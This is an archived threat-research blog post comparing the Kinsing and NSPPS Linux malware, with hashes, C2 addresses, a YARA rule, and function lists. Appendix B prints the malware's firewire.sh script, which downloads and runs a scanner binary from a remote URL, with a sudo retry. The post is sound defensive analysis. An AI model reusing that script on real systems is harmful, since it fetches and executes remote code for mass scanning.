{
	"id": "9e0bbe05-d548-4341-b056-765c0ca70e3e",
	"created_at": "2026-04-06T00:07:22.69125Z",
	"updated_at": "2026-04-10T13:12:22.88384Z",
	"deleted_at": null,
	"sha1_hash": "0abfbb0c64d835cbcfb708b8896fd6cbe9b4d13a",
	"title": "Kinsing: The Malware with Two Faces",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9032555,
	"plain_text": "Kinsing: The Malware with Two Faces\r\nBy Aluma Lavi Shaari\r\nPublished: 2021-03-09 · Archived: 2026-04-05 22:41:56 UTC\r\nLately, we’ve been busy researching the developing field of cloud and container threats. Why focus here?\r\nBecause, as this technology becomes more popular and continues to evolve, attackers are also evolving their\r\ntechniques to infiltrate these systems.\r\nDuring our research, we came across Kinsing – an ELF malware that has been involved in multiple attack\r\ncampaigns, including Redis and SaltStack. Kinsing is written in Go language, aka Golang, which is a relatively\r\nnew language that has seen sharply increased popularity among malware authors within the past few years.\r\nWhile analyzing a few Kinsing samples, we were surprised to find some artifacts related to another malware\r\nfamily called NSPPS. At first, we came up with several ideas that might explain those findings- maybe the\r\ncommon parts are open source tools that are used by both families, or perhaps one group mimics the other. What\r\nour research shows is the two families are actually the same one, with two different names that were given to it by\r\nthe security research community.\r\nIn this blog, we will review the differences and similarities between Kinsing and NSPPS, present our findings and\r\nexplain how and why we concluded that they are the same malware family.\r\nNSPPS vs. Kinsing – The Differences\r\nAt the beginning of the research, we collected all of the IOCs that were published by security firms for detecting\r\nKinsing and NSPPS, wrote our own YARA rules and gathered the results. After a little clean up, we had several\r\ndozens of samples that we focused on.\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 1 of 21\n\nOf the 27 samples of Kinsing and NSPPS, only one of them was published as NSPPS –\r\n5059d67cd24eb4b0b4a174a072ceac6a47e14c3302da2c6581f81c39d8a076c6. The other 26 samples were\r\nclassified as Kinsing.\r\nWe found some major artifacts differentiating the NSPPS sample from the Kinsing samples.\r\nVersions and Dates: Let’s Compare Numbers\r\nFirst and most notably, NSPPS sample was written using Golang version 1.9.7:\r\nFigure N. 1: Golang version for NSPPS\r\nKinsing samples were written using Golang version 1.13.4 or 1.13.6:\r\nFigure N. 2: Golang versions for NSPPS\r\nThis difference might imply that the compilation time of each sample is different, since it is reasonable to use the\r\nlatest version, although not necessary.\r\nDetermining the compilation timestamp of the samples was important to the process of differentiating the two\r\nfamilies. Unfortunately, unlike Windows PE files, Linux ELF files do not have a compilation timestamp by\r\ndesign, leaving us with another missing piece of information. Luckily, Golang malware (or generally speaking –\r\nGolang binaries) by default uses Github packages, which usually contain a version number. This helps to\r\ndetermine a minimum date for the malware compilation by calculating the last release date of the newest package\r\nit uses.\r\nBelow is a partial list of the common packages for Kinsing samples with their release dates:\r\nPackage Version Release Date\r\ngo-resty/resty 2.1.0 10/10/2019\r\ngoogle/btree 1.0.0 13/08/2018\r\nkelseyhightower/envconfig 1.4.0 24/05/2019\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 2 of 21\n\nPackage Version Release Date\r\nmarkbates/pkger 0.12.8 21/11/2019\r\npaulbellamy/ratecounter 0.2.0 19/07/2017\r\npeterbourgon/diskv 2.0.1 14/08/2017\r\nshirou/gopsutil 2.19.10 19/10/2019\r\nTable N. 1: a partial list of Kinsing packages with their release dates\r\n“pkger ” has the latest release date:\r\nFigure N. 3: latest package release for Kinsing\r\nTherefore, we can conclude that all 26 Kinsing samples were compiled after Nov. 21, 2019.\r\nBelow is a partial list of the packages NSPPS uses:\r\nPackage Version Release Date\r\ngoogle/btree 1.0.0 13/08/2018\r\ngo-resty/resty 2.1.0 10/10/2019\r\nkelseyhightower/envconfig 1.4.0 25/05/2019\r\npaulbellamy/ratecounter 0.2.0 19/07/2017\r\npeterbourgon/diskv 3.0.0 25/04/2019\r\nTable N. 2: a partial list of NSPPS packages with their release dates\r\nAs shown, the earliest possible compilation date for NSPPS is Oct. 10, 2019. This suggests it was compiled before\r\nKinsing, but that may not necessarily be the case.\r\nTo Be or Not to Be: That’s the Difference\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 3 of 21\n\nAn odd artifact found in Kinsing samples is the presence of the full text of William Shakespeare’s play Hamlet, as\r\nseen below:\r\nFigure N. 4: Hamlet play inside Kinsing\r\nThis evidence was previously published by several researchers. The common assumption is that this was done to\r\navoid detection by static detection engines or to increase the binary size, which serves the same goal. This artifact\r\nis not present in NSPPS samples.\r\nAt first, it seems like an important difference  – maybe the authors of Kinsing paid more attention to hiding their\r\nmalware than the authors of NSPPS. However, after digging a little deeper, we found another explanation. When\r\nchecking the location of the Hamlet play inside Kinsing, it has some references to it, rather than just existing in\r\nthe data section among other strings of the binary:\r\nFigure N. 5: Hamlet play X-refs\r\nThen, looking at the relevant function:\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 4 of 21\n\nFigure N. 6: code X-references to the Hamlet play\r\nThis function’s name is github.com.markbates.pkger.internal.takeon.github.com.markbates.hepa.filters, which\r\nmeans: “a function located in filters file in hepa package written by markbates and uploaded to Github, but\r\nactually embedded into pkger package written by markbates and uploaded to Github as well.”\r\nAnd as expected:\r\nFigure N. 7: pkger package that contains the Hamlet play\r\nWhich leads to the next piece of code:\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 5 of 21\n\nFigure N. 8: Hamlet play inside of pkger package\r\n(And of course, don’t forget to check release 0.12.8, as this piece was removed since then by the author.)\r\nWhen analyzing the hepa package, we understood the purpose of Hamlet- it is used to hide secret parts of a buffer.\r\nFor example, let’s say you want to upload your useful AWS script to GitHub for sharing your wisdom with the\r\nworld, but then you’re not sure if you removed all of the parts containing your secret AWS keys. In this situation,\r\nyou may use a tool that automatically searches for password-related information and removes it. Think about how\r\nawesome it would be to replace your token with a powerful phrase from Hamlet!\r\nNow, as you’ve probably noticed, the pkger package wasn’t listed as one of NSPPS’ packages, so the absence of\r\nHamlet from NSPPS is only related to the absence of this package that is used as part of cryptomining activity\r\n(more on this later).\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 6 of 21\n\nThe bottom line is, although Hamlet is considered to be (or not to be?) a great and meaningful play, it’s not\r\nmeaningful evidence in our comparison. Rather, it’s a side effect of other more significant elements.\r\nWhere’s the money?\r\nWhen reading reports about Kinsing samples, it is clear that the purpose of Kinsing is to install a cryptoMiner\r\nnamed kdevtmpfsi, as shown in this diagram from Aqua Security:\r\nFigure N. 9: Kinsing diagram as posted by Aqua Security\r\nSource: https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability\r\nWhen looking at the code of Kinsing samples, we find many functions related to the cryptominer activity:\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 7 of 21\n\nFigure N. 10: Kinsing functions related to Miner activity\r\nThose functions are called from main.main, which is the real main function of the code.\r\nAll of the code related to cryptomining activity, including checks and actions, is missing from the NSPPS sample.\r\nThis is a major difference between the two tools: the cryptomining functionality suggests that the purpose of the\r\nKinsing malware is to install a cryptominer in the victim system, while the purpose of the NSPPS malware is to\r\nprovide RAT functionality.\r\nNSPPS vs. Kinsing – The Similarities\r\nWhile we found several differences between Kinsing and NSPPS that make them look like completely different\r\nmalware families, a tiny voice reminds us that we promised to prove they are from the same family. Below are\r\nsome of those similarities.\r\nMasscan for All\r\nOne characteristic that repeats itself through all of the samples is the usage of the Masscan tool – more\r\nspecifically, the same exact usage of Masscan. Both Kinsing and NSPPS malware contain an embedded, clear-text\r\nbash script named firewire.sh that is executed by the function main.masscan. This function writes the script to the\r\ndisk, changes its mode to executable and then runs it.\r\nSee the full firewire.sh script in Appendix B.\r\nThe code in main.masscan that handles that is as follows:\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 8 of 21\n\nFigure N. 11: Kinsing’s code for handling firewire.sh\r\nThe main.masscan function for NSPPS is a little different (probably due to compiler difference as mentioned\r\nabove) but contains the same WriteFile -\u003e runcmd -\u003e newobject sequence as seen in Kinsing:\r\nFigure N. 12: NSPPS’s code for handling firewire.sh\r\nFrom our research, the firewire.sh script isn’t publicly available for use, nor has it been presented as an Open\r\nSource tool, so we believe that this piece of evidence isn’t just a coincidence. This means that there was a\r\nconnection between the authors of the two malwares, or at least that they shared their resources.\r\nCode Structure\r\nWhen analyzing NSPPS, it is notable that it features a very simple code structure. At the beginning of the code,\r\nNSPPS calls three initialization functions, then it enters a while loop that runs forever. The loop gets a task\r\n(getTask()) from the C2 server and executes it (doTask()). Inside the doTask function, the malware checks the\r\nstring it got, then chooses the right function for performing the received task.\r\nTo our surprise, when analyzing Kinsing, we found it has the same structure, except for a few minor changes. The\r\nmain change is an additional initialization function that’s responsible for cryptomining. There are also some minor\r\nchanges to the inner functions inside the loop.\r\nSee the code snippets below for a demonstration:\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 9 of 21\n\nFigure N. 13: Pseudo-Code for NSPPS’s and Kinsing’s code structure comparison\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 10 of 21\n\nThere are also differences between the different samples of Kinsing. For example, not all of them have the\r\n“redis_brute” functionality, and some have much fewer functions.\r\nLooking at the common structure we just described, we believe that the relation between the two families now\r\nhardly seems like a coincidence or random imitation, but more like cooperation between the authors – or even\r\nreuse of the same code.\r\nEncryption, Encryption, Encryption\r\nIn their analysis for the NSPPS sample, IronNet included a YARA rule that searches for an RC4 key used by\r\nNSPPS. Using this YARA and searching for this specific RC4 key, we found all of the Kinsing samples in it, as\r\nwell as the NSPPS sample:\r\nFigure N. 14: Kinsing RC4 key\r\nFigure N. 15: NSPPS RC4 key\r\nWhen checking the XRefs to this key to find the usage of it, we can see that it is used through almost the same\r\nfunctions in both malware families.\r\nUsage for NSPPS:\r\nFigure N. 16: RC4 key usage for NSPPS\r\nUsage for Kinsing:\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 11 of 21\n\nFigure N. 17: RC4 key usage for Kinsing\r\nThe only difference is the function getMinerPid that exists only in the Kinsing samples, since NSPPS doesn’t have\r\nthe same cryptomining functionality.\r\nLooking at the function main.RC4 that implements the RC4 encryption in both malwares, we see that the two\r\nimplementations are practically identical. See the comparison below:\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 12 of 21\n\nFigure N. 18: NSPPS’s and Kinsing’s main.RC4 function comparison\r\nFunctions Names\r\nAfter all of this, the last thing to show is the function list of those samples.\r\nGolang binaries have the property of preserving the source code symbols, which comes in handy in our case by\r\nmaking the entire list of original function names available. We already discussed the packages used in the binaries,\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 13 of 21\n\nwhich contain their own functions, so now we are interested in the functions that were written by the malware\r\nauthor. Those functions are identified by the prefix main., and they are the ones used in the next comparison.\r\nNSPPS has 63 functions.\r\nKinsing samples vary from each other a bit. Let’s compare a random Kinsing sample that was published earlier:\r\nb70d14a7c069c2a88a8a55a6a2088aea184f84c0e110678e6a4afa2eb377649f. This sample only has 59 functions\r\n(see Appendix C for a complete list of functions for both samples).\r\nBoth samples have 51 function names in common, which represent 83% of the functions. Kinsing has eight unique\r\nfunction names and NSPPS has 12. Kinsing’s unique functions are cryptomining-related while NSPPS’ unique\r\nfunctions are mostly RAT-related. From that, we learn that a major part of the code is named the same, which\r\nimplies that the same author wrote both samples or that one of the authors copied from the other.\r\nConclusion\r\nWe’ve presented both NSPPS and Kinsing and discussed their differences: Golang versions, packages, the Hamlet\r\nplay script and cryptomining activity. We also presented the similarities of the two families: the Masscan script\r\nnamed Firewire.sh, the shared code structure, the RC4 key and the function names.\r\nAll of the above suggests that both malwares represent the same family. We believe the first version was compiled\r\nsometime before Nov. 2019, was named NSPPS and was used as a RAT. Later, the malware was updated with\r\nsome new packages (such as markbates\\pkger), new functionalities (cryptomining capabilities), new Shakespeare\r\ninspiration and was named as Kinsing by other security companies.\r\nAlthough the usage and the purpose of the malware changed, we as researchers can still benefit from the\r\nsimilarities between the malware because analysis and detection can be much easier and quicker using the\r\nknowledge we already have from former versions.\r\nA Note About Detection via VirusTotal\r\nWhen signing some of Kinsing artifacts and searching for new samples, we found a few dozen files that clearly\r\ncontain a part of Kinsing’s code, but are damaged as executables and cannot be run as proper ELF. Further\r\nexamination helped us realize that those files are only a part of another sample, meaning someone cut the sample\r\nand uploaded it to VirusTotal. For example, the sample\r\nd247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b is a known Kinsing sample that is\r\n16.87 MB long, and the file a51a4398dd7f11e34ea4d896cde4e7b0537351f82c580f5ec951a8e7ea017865 that was\r\nuploaded to VirusTotal on June 19, 2020, was detected as Kinsing by some AV vendors, but is actually only the\r\nfirst 4.84 MB of the last sample.\r\nThese partial samples could be an attacker trying to test different parts of the malware against AV engines, or a\r\nsecurity researcher examining sections of the code. So, to detect only proper ELFs, a condition should be added to\r\nmatch only files in which the sum of their sections header sizes matches the size of the entire file (check out the\r\nYARA rule down below).\r\nAppendix A: IOCs \u0026 YARA\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 14 of 21\n\nIOCs:\r\nIndicator Type\r\n0b0aa978c061628ec7cd611edeec3373d4742cbda533b07a2b3eb84a9dd2cb8a Sha256\r\n0c811140be9f59d69da925a4e15eb630352fa8ad4f931730aec9ae80a624d584 Sha256\r\n2132d7bed60fda38adda28efdbbd2df2c9379fed5de2e68fc6801f5621b596b0 Sha256\r\n4b0138c12e3209d8f9250c591fcc825ee6bff5f57f87ed9c661df6d14500e993 Sha256\r\n4f4e69abb2e155a712df9b3d0387f9fb2d6db8f3a2c88d7bbe199251ec08683f Sha256\r\n5059d67cd24eb4b0b4a174a072ceac6a47e14c3302da2c6581f81c39d8a076c6 Sha256\r\n511de8dd7f3cb4c5d88cd5a62150e6826cb2f825fa60607a201a8542524442e2 Sha256\r\n554c233d0e034b8bb3560b010f99f70598f0e419e77b9ce39d5df0dd3bc25728 Sha256\r\n655ee9ddd6956af8c040f3dce6b6c845680a621e463450b22d31c3a0907727e4 Sha256\r\n6814d22be80e1475e47e8103b11a0ec0daa3a9fdd5caa3a0558d13dc16c143d9 Sha256\r\n681f88d79c3ecab8683b39f8107b29258deb2d58fcea7b0c008bab76e18aa607 Sha256\r\n6e8c96f9e9a886fd6c51cce7f6c50d1368ca5b48a398cc1fedc63c1de1576c1e Sha256\r\n7727a0b47b7fd56275fa3c1c4468db7fa201c788d1e56597c87deaff45aad634 Sha256\r\n7f9f8209dc619d686b32d408fed0beb3a802aa600ddceb5c8d2a9555cdb3b5e0 Sha256\r\n8c9b621ba8911350253efc15ab3c761b06f70f503096279f2a173c006a393ee1 Sha256\r\n98d3fd460e56eff5182d5abe2f1cd7f042ea24105d0e25ea5ec78fedc25bac7c Sha256\r\n9fbb49edad10ad9d096b548e801c39c47b74190e8745f680d3e3bcd9b456aafc Sha256\r\na0363f3caad5feb8fc5c43e589117b8053cbf5bc82fc0034346ea3e3984e37e8 Sha256\r\na5b010a5dd29d2f68ac9d5463eb8a29195f40f5103e1cc3353be2e9da6859dc6 Sha256\r\nb44dae9d1ce0ebec7a40e9aa49ac01e2c775fa9e354477a45b723c090b5a28f2 Sha256\r\nb70d14a7c069c2a88a8a55a6a2088aea184f84c0e110678e6a4afa2eb377649f Sha256\r\nc44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76 Sha256\r\nc9932ca45e952668238960dbba7f01ce699357bedc594495c0ace512706dd0ac Sha256\r\nccfda7239b2ac474e42ad324519f805171e7c69d37ad29265c0a8ba54096033d Sha256\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 15 of 21\n\nIndicator Type\r\nd247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b Sha256\r\ndb3b9622c81528ef2e7dbefb4e8e9c8c046b21ce2b021324739a195c966ae0b7 Sha256\r\nf2e7244e2a7d6b28b1040259855aeac956e56228c41808bccb8e37d87c164570 Sha256\r\n104.248.3.165 C2\r\n139.99.50.255 C2\r\n185.61.7.8 C2\r\n188.120.254.224 C2\r\n193.33.87.220 C2\r\n195.123.220.193 C2\r\n45.10.88.102 C2\r\n46.229.215.164 C2\r\n46.243.253.167 C2\r\n47.65.90.240 C2\r\n62.113.112.127 C2\r\n67.205.161.58 C2\r\n91.215.169.111 C2\r\nYARA:\r\nimport \"elf\"\r\nrule Kinsing_Malware\r\n{\r\nmeta:\r\nauthor = \"Aluma Lavi, CyberArk\"\r\ndate = \"22-01-2021\"\r\nversion = \"1.0\"\r\nhash = \"d247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b\"\r\ndescription = \"Kinsing/NSPPS malware\"\r\nstrings:\r\n$rc4_key = { 37 36 34 31 35 33 34 34 36 62 36 31 }\r\n$firewire = \"./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT\"\r\n$packa1 = \"google/btree\" ascii wide\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 16 of 21\n\n$packa2 = \"kardianos/osext\" ascii wide\r\n$packa3 = \"kelseyhightower/envconfig\" ascii wide\r\n$packa4 = \"markbates/pkger\" ascii wide\r\n$packa5 = \"nu7hatch/gouuid\" ascii wide\r\n$packa6 = \"paulbellamy/ratecounter\" ascii wide\r\n$packa7 = \"peterbourgon/diskv\" ascii wide\r\n$func1 = \"main.RC4\" ascii wide\r\n$func2 = \"main.runTaskWithScan\" ascii wide\r\n$func3 = \"main.backconnect\" ascii wide\r\n$func4 = \"main.downloadAndExecute\" ascii wide\r\n$func5 = \"main.startCmd\" ascii wide\r\n$func6 = \"main.execTaskOut\" ascii wide\r\n$func7 = \"main.minerRunningCheck\" ascii wide\r\ncondition:\r\n(uint16(0) == 0x457F\r\nand not (elf.sections[0].size + elf.sections[1].size + elf.sections[2].size + elf.sec\r\nand ($rc4_key\r\nor $firewire\r\nor all of ($packa*)\r\nor 4 of ($func*)\r\n)\r\n}\r\nAppendix B: Firewire.sh Script\r\n#!/bin/sh\r\nPORT=$1\r\nRATE=$2\r\nINPUT=$3\r\nOUTPUT=$4\r\nMASSCAN=$5\r\ncat /etc/os-release | grep -vw grep | grep \"rhel\" \u003e/dev/null\r\nif [ $? -eq 0 ]\r\nthen\r\nrpm -qa | grep libpcap-dev \u003e /dev/null\r\nif [[ $? -eq 0 ]]; then\r\necho \"Package is installed rhel!\"\r\nelse\r\necho \"Package is NOT installed rhel!\"\r\nyum -y update\r\nyum -y install libpcap-devel\r\nfi\r\nelse\r\nif [ $(dpkg-query -W -f='${Status}' libpcap-dev 2\u003e/dev/null | grep -c \"ok installed\"\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 17 of 21\n\nthen\r\necho \"Package is NOT installed deb!\"\r\napt-get update\r\napt-get install -y libpcap-dev\r\nelse\r\necho \"Package is installed deb!\"\r\nfi\r\nfi\r\nif [ -x \"$(command -v md5sum)\" ]; then\r\nsum=$(md5sum firewire | awk '{ print $1 }')\r\necho $sum\r\ncase $sum in\r\n45a7ef83238f5244738bb5e7e3dd6299)\r\necho \"firewire OK\"\r\n;;\r\n*)\r\necho \"firewire wrong\"\r\n(curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)\r\n;;\r\nesac\r\nelse\r\necho \"No md5sum\"\r\n(curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)\r\nfi\r\nchmod +x firewire\r\n./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2\u003e/dev/null\r\nif [ $? -eq 0 ]\r\nthen\r\necho \"success\"\r\nelse\r\necho \"fail\"\r\nsudo ./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2\u003e/dev/null\r\nif [ $? -eq 0 ]\r\nthen\r\necho \"success2\"\r\nelse\r\necho \"fail2\"\r\nfi\r\nfi\r\nAppendix C: NSPPS \u0026 Kinsing Function list\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 18 of 21\n\nNSPPS Kinsing\r\nDownloadFile DownloadFile\r\nExecOutput ExecOutput\r\nHosts Hosts\r\n  Pid\r\nRC4 RC4\r\nRandStringRunes RandStringRunes\r\nResult Result\r\nSetSocks SetSocks\r\nSpecification Specification\r\nTargetsWrapper TargetsWrapper\r\nTask Task\r\nTaskPair TaskPair\r\naddResult addResult\r\nbackconnect  \r\ncheckHealth checkHealth\r\nconnectForSocks connectForSocks\r\ncontains contains\r\n  copyFileContents\r\ndoRequestWithTooManyOpenFiles  \r\ndoTask doTask\r\ndownloadAndExecute  \r\nencStruct encStruct\r\nexecTask execTask\r\nexecTaskOut execTaskOut\r\ngetActiveC2CUrl  \r\n  getMinerPid\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 19 of 21\n\nNSPPS Kinsing\r\ngetOrCreateListForTaskResult getOrCreateListForTaskResult\r\ngetOrCreateRateCounterForTask getOrCreateRateCounterForTask\r\ngetOrCreateUuid getOrCreateUuid\r\ngetTargets getTargets\r\ngetTask getTask\r\ngetWriteableDir getWriteableDir\r\ngo go\r\nhash_file_md5 hash_file_md5\r\nhealthChecker healthChecker\r\ninc inc\r\ninit init\r\n  isMinerRunning\r\nmain main\r\nmakeClient  \r\nmasscan masscan\r\n  minRun\r\n  minerRunningCheck\r\nmove move\r\nrandIntRange randIntRange\r\nredisBrute  \r\nrequest  \r\nresultSender resultSender\r\nrunTask runTask\r\nrunTaskWithHttp  \r\nrunTaskWithScan  \r\nruncmd runcmd\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 20 of 21\n\nNSPPS Kinsing\r\n  sendMinerPid\r\nsendResult sendResult\r\nsendSocks sendSocks\r\nsetActiveC2CUrl setActiveC2CUrl\r\nsetExecOutput setExecOutput\r\nsetLog setLog\r\nsetUuid setUuid\r\nsocks socks\r\nstartCmd startCmd\r\n  startCmdWithOutputSingle\r\nstartSocks startSocks\r\nsyncCmd syncCmd\r\ntaskScan taskScan\r\ntaskWithHttpWorker  \r\ntaskWithScanWorker  \r\ntaskWorker taskWorker\r\ntcpTask  \r\nupdateTask updateTask\r\nwritable writable\r\nSource: https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 21 of 21",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces"
	],
	"report_names": [
		"kinsing-the-malware-with-two-faces"
	],
	"threat_actors": [
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434042,
	"ts_updated_at": 1775826742,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0abfbb0c64d835cbcfb708b8896fd6cbe9b4d13a.pdf",
		"text": "https://archive.orkl.eu/0abfbb0c64d835cbcfb708b8896fd6cbe9b4d13a.txt",
		"img": "https://archive.orkl.eu/0abfbb0c64d835cbcfb708b8896fd6cbe9b4d13a.jpg"
	}
}